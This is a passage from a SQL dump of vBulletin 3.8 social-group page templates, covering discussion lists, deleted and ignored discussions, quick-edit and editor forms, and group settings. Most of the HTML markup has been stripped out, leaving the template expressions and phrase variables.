    \r\n \")).\"\r\n
    \r\n \r\n\r\n $discussion[replies]\r\n\r\n \r\n\r\n
    $discussion[lastpostdate] $discussion[lastposttime]
    \r\n
    \r\n \".(($discussion[\'lastposterid\']) ? (\"\r\n \" . construct_phrase(\"$vbphrase[by_x]\", \"member.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"u=$discussion[lastposterid]\", \"$discussion[lastposter]\") . \"\r\n \") : (\"\r\n $discussion[musername]\r\n \")).\"\r\n session->vars[\'sessionurl\'] . \"do=discuss&gmid=$discussion[lastpostid]#gmessage$discussion[lastpostid]\\\">\\\"$vbphrase[go_to_last_post]\\\"\r\n
    \r\n \r\n\r\n \".(($discussion[showsubsinfo]) ? (\"\r\n \r\n \r\n \r\n \") : (\"\")).\"\r\n \r\n \".(($show[inlinemod]) ? (\"\r\n \".(($discussion[inlinemod]) ? (\"\") : (\"\")).\"\r\n \") : (\"\")).\"\r\n $template_hook[group_discussionbit_end]\r\n', '\r\n $template_hook[group_discussionbit_start]\r\n \r\n
    \r\n \r\n $vbphrase[by_x]\r\n \r\n $discussion[musername]\r\n \r\n
    $discussion[date] $discussion[time]
    \r\n
    \r\n\r\n \r\n \r\n \"$vbphrase[go_to_first_new_post]\" \r\n $vbphrase[moderated_discussion_prefix] \r\n $discussion[title]\r\n \r\n \r\n $vbphrase[moderated_discussion_prefix] \r\n $discussion[title]\r\n \r\n
    \r\n \r\n
    $vbphrase[group_x]
    \r\n \r\n
    $discussion[trimmessage]
    \r\n
    \r\n
    \r\n \r\n\r\n $discussion[replies]\r\n\r\n \r\n\r\n
    $discussion[lastpostdate] $discussion[lastposttime]
    \r\n
    \r\n \r\n $vbphrase[by_x]\r\n \r\n $discussion[musername]\r\n \r\n \"$vbphrase[go_to_last_post]\"\r\n
    \r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n alt1alt2\">\r\n
    \r\n $template_hook[group_discussionbit_end]\r\n', 'template', 1265387382, 'vBulletin Solutions', '3.8.5', 'vbulletin'), (1581, -1, 'socialgroups_discussionview', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n \" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $custompagetitle\r\n $socialgroups_css\r\n \r\n \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n$template_hook[group_discuss_before_messages]\r\n\r\n\r\n\r\n \r\n \r\n \".(($show[\'inlinemod\'] AND $show[\'popups\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n\r\n
    \r\n \r\n \".(($groupoptions[\'join\']) ? (\"\r\n session->vars[\'sessionurl\'] . \"do=join&groupid=$group[groupid]\\\">$vbphrase[join_group]\r\n \") : (\"\r\n \".((!$group[\'membertype\'] AND $group[\'type\'] == \'inviteonly\') ? (\"\r\n $vbphrase[group_type_inviteonly]\r\n \") : (\"\")).\"\r\n \")).\"\r\n \r\n $discussion[title]\r\n $vbphrase[discussion_tools]
    \r\n\r\n\r\n
    \r\n\r\n\r\n
    \r\n $messagebits\r\n
    \r\n\r\n$template_hook[group_discuss_after_messages]\r\n\r\n\".(($show[\'inlinemod\'] OR $pagenav OR $show[\'postlink\']) ? (\"\r\n
    \r\n \".(($pagenav) ? (\"\r\n
    \r\n $pagenav\r\n
    \r\n \") : (\"\")).\"\r\n \".(($show[\'inlinemod\']) ? (\"\r\n
    \r\n
    \r\n \r\n \r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n
    \r\n \") : (\"\")).\"\r\n \".(($show[\'postlink\']) ? (\"\") : (\"\")).\"\r\n
    \r\n\") : (\"\")).\"\r\n\r\n\r\n\".(($show[\'inlinemod\']) ? (\"\r\n \r\n\r\n \".(($show[popups]) ? (\"\r\n \r\n\r\n \r\n
      \r\n
    • $vbphrase[from_this_page]
    • \r\n
    • $vbphrase[select_all]
    • \r\n
    • $vbphrase[deselect_all]
    • \r\n
    • $vbphrase[invert_selection]
    • \r\n
    • options[\'cleargifurl\'] . \"\\\" alt=\\\"\\\" width=\\\"1\\\" height=\\\"1\\\" />
    • \r\n
    • $vbphrase[select_unapproved_posts]
    • \r\n
    • $vbphrase[select_deleted_posts]
    • \r\n
    \r\n \r\n \") : (\"\")).\"\r\n\") : (\"\")).\"\r\n\r\n
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n$template_hook[group_discuss_after_action_links]\r\n\r\n\".(($bookmarksites) ? (\"\r\n\r\n
    \r\n
    \r\n
    \r\n $vbphrase[bookmarks]\r\n
    \r\n
    \r\n
      $bookmarksites
    \r\n
    \r\n
    \r\n\r\n\") : (\"\")).\"\r\n\r\n
    \r\n\r\n$template_hook[group_discuss_after_bookmarks]\r\n\r\n\".(($show[\'quickcomment\']) ? (\"\r\n
    \r\n
    \r\n \".(($groupoptions[\'join\'] OR $groupoptions[\'leave\']) ? (\"\r\n \r\n \".(($groupoptions[\'join\']) ? (\"\r\n session->vars[\'sessionurl\'] . \"do=join&groupid=$group[groupid]\\\">$vbphrase[join_group]\r\n \") : (\"\r\n \".((!$group[\'membertype\'] AND $group[\'type\'] == \'inviteonly\') ? (\"\r\n $vbphrase[group_type_inviteonly]\r\n \") : (\"\")).\"\r\n \")).\"\r\n \".(($groupoptions[\'join\'] AND $groupoptions[\'leave\']) ? (\"\r\n  | \r\n \") : (\"\")).\"\r\n \".(($groupoptions[\'leave\']) ? (\"session->vars[\'sessionurl\'] . \"do=leave&groupid=$group[groupid]\\\">$groupoptions[leavephrase]\") : (\"\")).\"\r\n \r\n \") : (\"\")).\"\r\n $vbphrase[quick_reply]\r\n
    \r\n\r\n $vBeditTemplate[clientscript]\r\n\r\n
    session->vars[\'sessionurl\'] . \"do=message\\\" method=\\\"post\\\" id=\\\"message_form\\\">\r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n
    \r\n
    $vbphrase[errors_occured_when_submitted]
    \r\n
     
    \r\n
    \r\n
    \r\n
    \r\n\r\n
    $vbphrase[message]: \".(($show[\'auto_moderation\']) ? (\"$vbphrase[this_post_will_be_automatically_moderated]\") : (\"\")).\"
    \r\n
    $messagearea
    \r\n \".(($allowed_bbcode) ? (\"
    $allowed_bbcode
    \") : (\"\")).\"\r\n
    \r\n \r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n userinfo[\'userid\'] . \"\\\" />\r\n \r\n \r\n \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n \\\"$vbphrase[posting_comment]\r\n $vbphrase[posting_message_please_wait]\r\n
    \r\n\r\n \r\n \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n \") : (\"\")).\"\r\n

    \r\n\r\n\".(($show[\'edit\'] AND $show[\'popups\']) ? (\"\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n \r\n $vbphrase[vbulletin_message]\r\n
     
    $vbphrase[cancel_changes]
    \r\n\r\n\") : (\"\")).\"\r\n\r\n\".((!$show[popups]) ? (\"\r\n\r\n
    \r\n \r\n\r\n\") : (\"\")).\"\r\n\r\n$template_hook[group_discuss_after_quick_reply]\r\n\r\n$footer\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n $vboptions[bbtitle] - $custompagetitle\r\n $socialgroups_css\r\n \r\n \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n$template_hook[group_discuss_before_messages]\r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n\r\n
    \r\n \r\n \r\n $vbphrase[join_group]\r\n \r\n \r\n $vbphrase[group_type_inviteonly]\r\n \r\n \r\n \r\n $discussion[title]\r\n $vbphrase[discussion_tools]
    \r\n\r\n\r\n
    \r\n\r\n\r\n
    \r\n $messagebits\r\n
    \r\n\r\n$template_hook[group_discuss_after_messages]\r\n\r\n\r\n
    \r\n \r\n
    \r\n $pagenav\r\n
    \r\n
    \r\n \r\n
    \r\n
    \r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n
    \"$vbphrase[reply]\"
    \r\n
    \r\n
    \r\n\r\n\r\n\r\n \r\n\r\n \r\n \r\n\r\n \r\n
      \r\n
    • $vbphrase[from_this_page]
    • \r\n
    • $vbphrase[select_all]
    • \r\n
    • $vbphrase[deselect_all]
    • \r\n
    • $vbphrase[invert_selection]
    • \r\n
    • \"\"
    • \r\n
    • $vbphrase[select_unapproved_posts]
    • \r\n
    • $vbphrase[select_deleted_posts]
    • \r\n
    \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n$template_hook[group_discuss_after_action_links]\r\n\r\n\r\n\r\n
    \r\n
    \r\n
    \r\n $vbphrase[bookmarks]\r\n
    \r\n
    \r\n
      $bookmarksites
    \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n
    \r\n\r\n$template_hook[group_discuss_after_bookmarks]\r\n\r\n\r\n
    \r\n
    \r\n \r\n \r\n \r\n $vbphrase[join_group]\r\n \r\n \r\n $vbphrase[group_type_inviteonly]\r\n \r\n \r\n \r\n  | \r\n \r\n $groupoptions[leavephrase]\r\n \r\n \r\n $vbphrase[quick_reply]\r\n
    \r\n\r\n $vBeditTemplate[clientscript]\r\n\r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n
    \r\n
    $vbphrase[errors_occured_when_submitted]
    \r\n
     
    \r\n
    \r\n
    \r\n
    \r\n\r\n
    $vbphrase[message]: $vbphrase[this_post_will_be_automatically_moderated]
    \r\n
    $messagearea
    \r\n
    $allowed_bbcode
    \r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n \"$vbphrase[posting_comment]\r\n $vbphrase[posting_message_please_wait]\r\n
    \r\n\r\n \r\n \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n \r\n

    \r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n \r\n $vbphrase[vbulletin_message]\r\n
     
    $vbphrase[cancel_changes]
    \r\n\r\n
    \r\n\r\n\r\n\r\n
    \r\n
    \r\n \r\n
    $vbphrase[discussion_tools]
    \r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n\r\n
    \r\n\r\n$template_hook[group_discuss_after_quick_reply]\r\n\r\n$footer\r\n\r\n', 'template', 1224606497, 'vBulletin Solutions', '3.8.0 Beta 2', 'vbulletin'), (1582, -1, 'socialgroups_discussion_deleted', '\r\n \r\n
    \r\n \".(($discussion[\'lastposterid\']) ? (\"\r\n \" . construct_phrase(\"$vbphrase[by_x]\", \"member.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"u=$discussion[lastposterid]\", \"$discussion[lastposter]\") . \"\r\n \") : (\"\r\n $discussion[musername]\r\n \")).\"\r\n
    $discussion[date]\".((!$show[\'detailedtime\']) ? (\" $discussion[time]\") : (\"\")).\"
    \r\n
    \r\n \".(($discussion[moderated]) ? (\"$vbphrase[moderated_discussion_prefix] \") : (\"\")).\"$discussion[title]\r\n \r\n
    \r\n \r\n \" . construct_phrase(\"$vbphrase[discussion_deleted_by_x]\", \"member.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"u=$discussion[del_userid]\", \"$discussion[del_username]\") . \"\r\n \".(($discussion[\'del_reason\']) ? (\"$vbphrase[reason] : $discussion[del_reason]\") : (\"\")).\"\r\n \r\n
    \r\n \r\n\r\n \r\n \" . construct_phrase(\"$vbphrase[discussion_deleted_by_x]\", \"member.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"u=$discussion[del_userid]\", \"$discussion[del_username]\") . \"\r\n \r\n\r\n \".(($show[inlinemod]) ? (\"\r\n \".(($discussion[inlinemod]) ? (\"\") : (\"\")).\"\r\n \") : (\"\")).\"\r\n', '\r\n \r\n
    \r\n \r\n $vbphrase[by_x]\r\n \r\n $discussion[musername]\r\n \r\n
    $discussion[date] $discussion[time]
    \r\n
    \r\n $vbphrase[moderated_discussion_prefix] $discussion[title]\r\n \r\n
    \r\n \r\n $vbphrase[discussion_deleted_by_x]\r\n $vbphrase[reason] : $discussion[del_reason]\r\n \r\n
    \r\n \r\n\r\n \r\n $vbphrase[discussion_deleted_by_x]\r\n \r\n\r\n \r\n \r\n \r\n', 'template', 1219079766, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'), (1583, -1, 'socialgroups_discussion_ignored', '\r\n \r\n
    \r\n \".(($discussion[\'lastposterid\']) ? (\"\r\n \" . construct_phrase(\"$vbphrase[by_x]\", \"member.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"u=$discussion[lastposterid]\", \"$discussion[lastposter]\") . \"\r\n \") : (\"\r\n $discussion[musername]\r\n \")).\"\r\n
    $discussion[date]\".((!$show[\'detailedtime\']) ? (\" $discussion[time]\") : (\"\")).\"
    \r\n
    \r\n \r\n \".(($discussion[moderated]) ? (\"$vbphrase[moderated_discussion_prefix] \") : (\"\")).\"$discussion[title]\r\n
    \r\n
    \" . construct_phrase(\"$vbphrase[discussion_hidden_x_on_ignore_list]\", \"$discussion[username]\", \"profile.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"do=ignorelist\") . \"
    \r\n
    \r\n \r\n\r\n $discussion[replies]\r\n\r\n \r\n\r\n
    $discussion[lastpostdate] $discussion[lastposttime]
    \r\n
    \r\n \".(($discussion[\'lastposterid\']) ? (\"\r\n \" . construct_phrase(\"$vbphrase[by_x]\", \"member.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"u=$discussion[lastposterid]\", \"$discussion[lastposter]\") . \"\r\n \") : (\"\r\n $discussion[musername]\r\n \")).\"\r\n session->vars[\'sessionurl\'] . \"do=discuss&gmid=$discussion[lastpostid]#gmessage$discussion[lastpostid]\\\">\\\"$vbphrase[go_to_last_post]\\\"\r\n
    \r\n \r\n\r\n \".(($show[inlinemod]) ? (\"\r\n \".(($discussion[inlinemod]) ? (\"\") : (\"\")).\"\r\n \") : (\"\")).\"\r\n', '\r\n alt2alt1
    \" width=\"100%\" id=\"gdiscussion$discussion[gmid]\" title=\"$discussion[title]\">\r\n
    \r\n \r\n $vbphrase[by_x]\r\n \r\n $discussion[musername]\r\n \r\n
    $discussion[date] $discussion[time]
    \r\n
    \r\n \r\n $vbphrase[moderated_discussion_prefix] $discussion[title]\r\n
    \r\n
    $vbphrase[discussion_hidden_x_on_ignore_list]
    \r\n
    \r\n \r\n\r\n $discussion[replies]\r\n\r\n \r\n\r\n
    $discussion[lastpostdate] $discussion[lastposttime]
    \r\n
    \r\n \r\n $vbphrase[by_x]\r\n \r\n $discussion[musername]\r\n \r\n \"$vbphrase[go_to_last_post]\"\r\n
    \r\n \r\n\r\n \r\n \r\n \r\n', 'template', 1219079779, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'), (1584, -1, 'socialgroups_discussion_quickedit', '\".(($show[\'quick_edit_form_tag\']) ? (\"
    \") : (\"\")).\"\r\n\r\n\r\n\r\n \r\n\r\n
    \r\n \".(($show[\'editor_toolbar\']) ? (\"\r\n
    \r\n \r\n \r\n \r\n \".(($show[\'basic_bbcode\']) ? (\"\r\n \r\n \r\n \r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'color_bbcode\']) ? (\"\r\n \r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'url_bbcode\'] OR $show[\'img_bbcode\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'url_bbcode\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'img_bbcode\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'quote_bbcode\']) ? (\"\r\n \r\n \r\n \") : (\"\")).\"\r\n \".((!is_browser(\'opera\')) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \".((is_browser(\'ie\')) ? (\"\r\n \r\n \r\n \") : (\"\")).\"\r\n \r\n \".(($show[\'wysiwyg_compatible\']) ? (\"\r\n \r\n \r\n \") : (\"\")).\"\r\n \r\n
    \\\"$vbphrase[remove_text_formatting]\\\"
    \\\"\\\"
    \\\"$vbphrase[bold]\\\"
    \\\"$vbphrase[italic]\\\"
    \\\"$vbphrase[underline]\\\"
    \\\"\\\"
    \r\n \r\n \r\n \r\n \r\n \r\n
    \\\"\\\"
    options[\'cleargifurl\'] . \"\\\" id=\\\"{$editorid}_color_bar\\\" alt=\\\"\\\" style=\\\"background-color:black\\\" width=\\\"21\\\" height=\\\"4\\\" />
    \\\"\\\"
    \r\n
    \\\"\\\"
    \\\"$vbphrase[insert_link]\\\"
    \\\"$vbphrase[insert_image]\\\"
    \\\"\\\"
    \\\"$vbphrase[wrap_quote_tags]\\\"
     \\\"\\\"
    \\\"$vbphrase[check_spelling]\\\"
    \r\n
    \\\"\\\"
    \r\n
    \\\"\\\"
    \r\n
    \\\"\\\"
    \\\"$vbphrase[switch_editor_mode]\\\"
    \r\n
    \r\n \") : (\"\")).\"\r\n\r\n
    \r\n
    \r\n
    $vbphrase[reason_for_editing]:
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n \\\"$vbphrase[posting_message_please_wait]\\\"\r\n \r\n \r\n \".(($show[\'deletepostoption\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \r\n
    \r\n\r\n \r\n\r\n \".(($show[\'deletepostoption\']) ? (\"\r\n
    \r\n\r\n
    \r\n\r\n
    \r\n
    $vbphrase[delete_message_check_appropriate_option]
    \r\n \".(($show[\'firstpostnote\']) ? (\"\r\n
    $vbphrase[deleting_message_deletion_of_thread]
    \r\n \") : (\"\")).\"\r\n
    \r\n\r\n
    \r\n $vbphrase[deletion_options]\r\n
    \r\n
    \r\n \r\n
    \r\n \".(($show[\'softdeleteoption\']) ? (\"\r\n
    \r\n \r\n \".(($show[\'physicaldeleteoption\'] AND $show[\'keepattachmentsoption\']) ? (\"()\") : (\"\")).\"\r\n
    \r\n \") : (\"\")).\"\r\n \".(($show[\'physicaldeleteoption\']) ? (\"\r\n
    \r\n \r\n
    \r\n \") : (\"\")).\"\r\n
    \r\n
    \r\n\r\n \r\n \r\n \r\n \r\n \r\n
    \r\n
    $vbphrase[reason_for_deletion]:
    \r\n \r\n
    \r\n\r\n
    \r\n \") : (\"\")).\"\r\n\r\n
    \r\n\r\n\".(($show[\'quick_edit_form_tag\']) ? (\"
    \") : (\"\")).\"', '
    \r\n\r\n\r\n\r\n \r\n\r\n
    \r\n \r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \"$vbphrase[remove_text_formatting]\"
    \"\"
    \"$vbphrase[bold]\"
    \"$vbphrase[italic]\"
    \"$vbphrase[underline]\"
    \"\"
    \r\n \r\n \r\n \r\n \r\n \r\n
    \"\"
    \"\"
    \"\"
    \r\n
    \"\"
    \"$vbphrase[insert_link]\"
    \"$vbphrase[insert_image]\"
    \"\"
    \"$vbphrase[wrap_quote_tags]\"
     \"\"
    \"$vbphrase[check_spelling]\"
    \r\n
    \"\"
    \r\n
    \"\"
    \r\n
    \"\"
    \"$vbphrase[switch_editor_mode]\"
    \r\n
    \r\n
    \r\n\r\n
    \r\n
    \r\n
    $vbphrase[reason_for_editing]:
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n \"$vbphrase[posting_message_please_wait]\"\r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n\r\n \r\n\r\n \r\n
    \r\n\r\n
    \r\n\r\n
    \r\n
    $vbphrase[delete_message_check_appropriate_option]
    \r\n \r\n
    $vbphrase[deleting_message_deletion_of_thread]
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[deletion_options]\r\n
    \r\n
    \r\n \r\n
    \r\n \r\n
    \r\n \r\n ()\r\n
    \r\n
    \r\n \r\n
    \r\n \r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n \r\n \r\n \r\n \r\n \r\n
    \r\n
    $vbphrase[reason_for_deletion]:
    \r\n \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n\r\n
    ', 'template', 1218454995, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'), (1585, -1, 'socialgroups_editor', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $pagetitle\r\n\r\n\r\n$header\r\n\r\n$navbar\r\n\r\n\".(($show[\'delete\'] OR $show[\'physicaldeleteoption\']) ? (\"\r\n
    \r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n \r\n \r\n\r\n
    \r\n \\\"\\\"\r\n \".(($delete_discussion) ? (\"\r\n $vbphrase[delete_group_discussion]\r\n \") : (\"\r\n $vbphrase[delete_message]\r\n \")).\"\r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n \".(($delete_discussion) ? (\"\r\n $vbphrase[delete_discussion_check_appropriate_option]\r\n \") : (\"\r\n $vbphrase[delete_message_check_appropriate_option]\r\n \")).\"\r\n\r\n
    \r\n\r\n
    \r\n $vbphrase[deletion_options]\r\n
    \r\n
    \r\n \r\n
    \r\n \".(($show[\'delete\']) ? (\"\r\n
    \r\n \r\n
    \r\n \") : (\"\")).\"\r\n \".(($show[\'physicaldeleteoption\']) ? (\"\r\n
    \r\n \r\n
    \r\n \") : (\"\")).\"\r\n
    \r\n
    \r\n\r\n
    \r\n
    $vbphrase[reason_for_deletion]:
    \r\n \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n
    \r\n\r\n
    \r\n
    \r\n
    \r\n\") : (\"\")).\"\r\n\r\n$postpreview\r\n\r\n
    options[\'postminchars\'] . \")\\\"\") : (\"\")).\">\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n \".(($show[\'edit\']) ? (\"\r\n $vbphrase[social_group]: session->vars[\'sessionurl\'] . \"groupid=$group[groupid]\\\">$group[name]\r\n \".(($edit_discussion) ? (\"\r\n $vbphrase[edit_discussion]\r\n \") : (\"\r\n $vbphrase[edit_message]\r\n \")).\"\r\n \") : (\"\r\n \".(($edit_discussion) ? (\"\r\n $vbphrase[post_new_discussion]\r\n \") : (\"\r\n $vbphrase[reply_to_discussion]\r\n \")).\"\r\n \")).\"\r\n
    \r\n
    \r\n
    \r\n\r\n $usernamecode\r\n\r\n $human_verify\r\n\r\n \".(($edit_discussion) ? (\"\r\n
    $vbphrase[subject]:
    \r\n options[\'titlemaxchars\'] . \"\\\" tabindex=\\\"1\\\" title=\\\"$vbphrase[subject]\\\" />\r\n \") : (\"\")).\"\r\n \r\n
    $vbphrase[message]: \".(($show[\'auto_moderation\']) ? (\"$vbphrase[this_post_will_be_automatically_moderated]\") : (\"\")).\"
    \r\n $messagearea\r\n \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n \r\n userinfo[\'userid\'] . \"\\\" />\r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n\r\n\".(($show[\'additional_options\']) ? (\"\r\n
    \r\n\r\n\r\n\r\n \r\n \r\n \r\n\r\n\r\n \r\n \r\n \r\n\r\n
    \r\n \\\"\\\"\r\n $vbphrase[additional_options]\r\n
    \r\n
    \r\n
    \r\n\r\n \".(($show[\'misc_options\']) ? (\"\r\n
    \r\n $vbphrase[miscellaneous_options]\r\n
    \r\n \".(($show[\'parseurl\']) ? (\"
    \") : (\"\")).\"\r\n $disablesmiliesoption\r\n
    \r\n
    \r\n \") : (\"\")).\"\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\") : (\"\")).\"\r\n\r\n
    \r\n\r\n\".(($messagebits) ? (\"\r\n
    \r\n\r\n\r\n\r\n \r\n \r\n \r\n\r\n\r\n \r\n \r\n \r\n\r\n
    \r\n \\\"\\\"\r\n $vbphrase[message_dialog]\r\n
    \r\n
    \r\n\r\n $messagebits\r\n\r\n
    \r\n
    \r\n\") : (\"\")).\"\r\n\r\n
    \r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $pagetitle\r\n\r\n\r\n$header\r\n\r\n$navbar\r\n\r\n\r\n
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n \r\n \r\n\r\n
    \r\n \"\"\r\n \r\n $vbphrase[delete_group_discussion]\r\n \r\n $vbphrase[delete_message]\r\n \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n \r\n $vbphrase[delete_discussion_check_appropriate_option]\r\n \r\n $vbphrase[delete_message_check_appropriate_option]\r\n \r\n\r\n
    \r\n\r\n
    \r\n $vbphrase[deletion_options]\r\n
    \r\n
    \r\n \r\n
    \r\n \r\n
    \r\n \r\n
    \r\n
    \r\n \r\n
    \r\n \r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n
    $vbphrase[reason_for_deletion]:
    \r\n \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n
    \r\n\r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n$postpreview\r\n\r\n
    onsubmit=\"return vB_Editor[\'$editorid\'].prepare_submit(0, $vboptions[postminchars])\">\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n \r\n $vbphrase[social_group]: $group[name]\r\n \r\n $vbphrase[edit_discussion]\r\n \r\n $vbphrase[edit_message]\r\n \r\n \r\n \r\n $vbphrase[post_new_discussion]\r\n \r\n $vbphrase[reply_to_discussion]\r\n \r\n \r\n
    \r\n
    \r\n
    \r\n\r\n $usernamecode\r\n\r\n $human_verify\r\n\r\n \r\n
    $vbphrase[subject]:
    \r\n \r\n
    \r\n \r\n
    $vbphrase[message]: $vbphrase[this_post_will_be_automatically_moderated]
    \r\n $messagearea\r\n \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n\r\n\r\n
    \r\n\r\n\r\n\r\n \r\n \r\n \r\n\r\n\r\n \r\n \r\n \r\n\r\n
    \r\n \"\"\r\n $vbphrase[additional_options]\r\n
    \r\n
    \r\n
    \r\n\r\n \r\n
    \r\n $vbphrase[miscellaneous_options]\r\n
    \r\n
    \r\n $disablesmiliesoption\r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n\r\n
    \r\n\r\n\r\n\r\n \r\n \r\n \r\n\r\n\r\n \r\n \r\n \r\n\r\n
    \r\n \"\"\r\n $vbphrase[message_dialog]\r\n
    \r\n
    \r\n\r\n $messagebits\r\n\r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n$footer\r\n\r\n\r\n', 'template', 1221757660, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'), (1586, -1, 'socialgroups_form', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $custompagetitle\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\".((!$icononly) ? (\"\r\n
    \r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n $phrase\r\n \".(($_REQUEST[\'do\'] == \'edit\') ? (\"\r\n session->vars[\'sessionurl\'] . \"groupid=$group[groupid]\\\">$group[name]\r\n \") : (\"\")).\"\r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n
    \r\n \r\n
    \r\n\r\n \".(($show[\'title\']) ? (\"\r\n
    \r\n
    \r\n options[\'sg_name_maxchars\'] . \"\\\" value=\\\"$group[rawname]\\\" tabindex=\\\"1\\\" />\r\n
    \r\n \") : (\"\")).\"\r\n\r\n
    \r\n
    \r\n \r\n
    \r\n\r\n
    \r\n
    \r\n \r\n
    \r\n\r\n \".(($show[\'options\']) ? (\"\r\n
    \r\n $vbphrase[group_options]\r\n
    \r\n \".(($show[\'enable_group_albums\']) ? (\"\r\n
    \r\n \r\n
    \r\n \") : (\"\")).\"\r\n \".(($show[\'enable_group_messages\']) ? (\"\r\n
    \r\n \r\n
    \r\n \") : (\"\")).\"\r\n \".(($show[\'mod_queue\']) ? (\"\r\n
    \r\n \r\n
    \r\n \") : (\"\")).\"\r\n \".(($show[\'join_to_view\']) ? (\"\r\n
    \r\n \r\n
    \r\n \") : (\"\")).\"\r\n \".(($show[\'only_owner_discussions\']) ? (\"\r\n
    \r\n \r\n
    \r\n \") : (\"\r\n \r\n \")).\"\r\n
    \r\n
    \r\n \") : (\"\")).\"\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n
